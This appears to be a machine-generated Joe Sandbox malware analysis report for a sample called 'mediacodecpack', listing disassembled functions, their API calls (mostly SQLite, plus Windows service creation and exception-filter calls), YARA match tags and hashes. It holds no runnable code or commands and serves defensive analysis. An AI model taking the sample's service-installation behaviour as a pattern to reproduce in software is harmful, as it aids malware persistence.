                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                • String ID: ASC$DESC$x
                                                                                • API String ID: 4082667235-1162196452
                                                                                • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                APIs
                                                                                • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                  • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                  • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                  • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                  • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                  • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                • String ID:
                                                                                • API String ID: 961572588-0
                                                                                • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                • String ID: 2$foreign key$indexed
                                                                                • API String ID: 4126863092-702264400
                                                                                • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_stricmp
                                                                                • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                • API String ID: 912767213-1308749736
                                                                                • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                APIs
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                  • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                • String ID:
                                                                                • API String ID: 4082478743-0
                                                                                • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                APIs
                                                                                  • Part of subcall function 02D08ADD: __EH_prolog.LIBCMT ref: 02D08AE2
                                                                                  • Part of subcall function 02D08ADD: _Allocate.LIBCPMT ref: 02D08B39
                                                                                  • Part of subcall function 02D08ADD: _memmove.LIBCMT ref: 02D08B90
                                                                                • _memset.LIBCMT ref: 02D0F949
                                                                                • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D0F9B2
                                                                                • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D0F9BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                • String ID: Unknown error$invalid string position
                                                                                • API String ID: 1854462395-1837348584
                                                                                • Opcode ID: d4625599a5a996c34edd25bfee29052e525d500d3a52e278ad9d07c387adb678
                                                                                • Instruction ID: f994d6c6845fa97007e5260010bb84a3575192df467ec9c462bb81a445ab6844
                                                                                • Opcode Fuzzy Hash: d4625599a5a996c34edd25bfee29052e525d500d3a52e278ad9d07c387adb678
                                                                                • Instruction Fuzzy Hash: 3F519D706083419FE724CF25C890B2EBBE4EB98744F64492DF49297BE1DB71E948CB52
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID: BINARY$INTEGER
                                                                                • API String ID: 317512412-1676293250
                                                                                • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                  • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                  • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                • String ID:
                                                                                • API String ID: 4038589952-0
                                                                                • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                APIs
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                • String ID:
                                                                                • API String ID: 247099642-0
                                                                                • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                APIs
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                  • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                • String ID:
                                                                                • API String ID: 326482775-0
                                                                                • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                APIs
                                                                                • CreateServiceA.ADVAPI32 ref: 00401CEA
                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401DE8
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D9DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Create
                                                                                • String ID:
                                                                                • API String ID: 2095555506-0
                                                                                • Opcode ID: 4e24f678e77db617d62248852af96b5ef48e6e3678e00e895b71c32aaecc4b87
                                                                                • Instruction ID: 0fe43908b2f4f2b97dabd4b25638809676d0a1fd937f47625bea1c7d26ae5c5c
                                                                                • Opcode Fuzzy Hash: 4e24f678e77db617d62248852af96b5ef48e6e3678e00e895b71c32aaecc4b87
                                                                                • Instruction Fuzzy Hash: F3D092B0C48104EBCB142BE19E588693E35AB84311721047BE042B24A0CB79A84AEA6A
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1477753154-0
                                                                                • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D13B06,?,?,?,00000001), ref: 02D180ED
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D180F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: ae71e4da07445ffa421af250dd1b92345609446fbdb4314120a996ef8dc21339
                                                                                • Instruction ID: 71a9f677beba410c332d20c652407cb7ab012d0a2772747d0c2f6fcb25257817
                                                                                • Opcode Fuzzy Hash: ae71e4da07445ffa421af250dd1b92345609446fbdb4314120a996ef8dc21339
                                                                                • Instruction Fuzzy Hash: 2FB09231484208ABCB242B91FD19F683F28FB54692FE58810FA1E442508B6259349AD2
                                                                                APIs
                                                                                  • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1465156292-0
                                                                                • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 02D0E873
                                                                                  • Part of subcall function 02D0E6FA: _memmove.LIBCMT ref: 02D0E7B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove_memset
                                                                                • String ID:
                                                                                • API String ID: 3555123492-0
                                                                                • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                • Instruction ID: cfcc74c391d3f7aebca6ad7c92dd31c972c048099b477b78b8a744ee0b6a3374
                                                                                • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                • Instruction Fuzzy Hash: 05F082B190430DBAD700DF99D942B8DFBB8FF44310F208569D50CA7381E6B07A118B90
                                                                                APIs
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 00401DAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CtrlDispatcherServiceStart
                                                                                • String ID:
                                                                                • API String ID: 3789849863-0
                                                                                • Opcode ID: 481d2a331ace871461dda5285e7bc1a2b0e16cf770cc1648d6e887654da7be60
                                                                                • Instruction ID: 9e018714e0f28fb6a0f73ad3a544a0159f2dc19adf5a91f1fcc555a1f79ca4ff
                                                                                • Opcode Fuzzy Hash: 481d2a331ace871461dda5285e7bc1a2b0e16cf770cc1648d6e887654da7be60
                                                                                • Instruction Fuzzy Hash: 3ED05E35508529CFD790AB148D887E933B4BB0D782F1604A6944DF6191CB348B89DB2C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
